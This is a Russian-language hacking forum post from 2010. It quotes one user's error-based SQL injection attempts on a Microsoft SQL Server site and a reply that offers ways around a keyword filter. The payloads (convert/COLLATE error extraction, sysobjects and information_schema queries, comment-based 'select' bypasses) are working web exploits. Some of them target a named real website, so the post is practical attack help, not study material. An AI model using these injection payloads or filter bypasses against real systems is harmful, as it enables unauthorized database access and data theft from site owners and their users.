22.05.2010, 10:47
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.12.2006
Сообщений: 195
Провел на форуме:
14023893
Репутация:
2163
|
|
Сообщение от YuNi|[c
привет, тут у меня вопрос по mssql inj
Код:
http://www.site.com/script.asp?id=convert(int,@@version COLLATE SQL_Latin1_General_Cp1254_CS_AS)--
Код:
Sql Version: Microsoft SQL Server 2005 - 9.00.3042.00 (X64)
Feb 10 2007 00:59:02
Copyright (c) 1988-2005 Microsoft Corporation
Enterprise Edition (64-bit) on Windows NT 5.2 (Build 3790: Service Pack 2)
попробовал or 1=(select db_name())-- редирект дал.
потом без селекта
Код:
http://www.site.com/script.asp?id=convert(int,db_name() COLLATE SQL_Latin1_General_Cp1254_CS_AS)--
DB Name: SSDB
запрос:
Код:
http://www.site.com/script.asp?id=convert(int,(SELECT TOP 1 cast(name COLLATE SQL_Latin1_General_Cp1254_CS_AS as nvarchar(4000))%2bchar(126) FROM SSDB..sysobjects WHERE xtype=char(85)))--
дает редир 
А ЗАПРОС:
Код:
http://www.site.com/script.asp?id=+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES)--
тоже редирект дает
тут видимо фильтруется select. Кто нит может посоветовать как обходит при таком фильтрации?
заранее спс методом научного тыка:
http://www.stockhouse.com/adredirect.asp?sid=select true
http://www.stockhouse.com/adredirect.asp?sid=+select true
http://www.stockhouse.com/adredirect.asp?sid=select+ false
=> 'select%'
http://www.stockhouse.com/adredirect.asp?sid=(select/**/top+1+table_name+from+information_schema.tables)
__________________
Я так же грустен как орангутанг
Сидящей пред галдящею толпою
Суровый житель отогретых стран
Коварно преданный разлуке и покою
Ему и мне насмешница судьба
Дала для жизни крохотную клетку
Нам предстоит в ней долгоя хотьба
За тертую морковь, и за конфетку..
|
|
|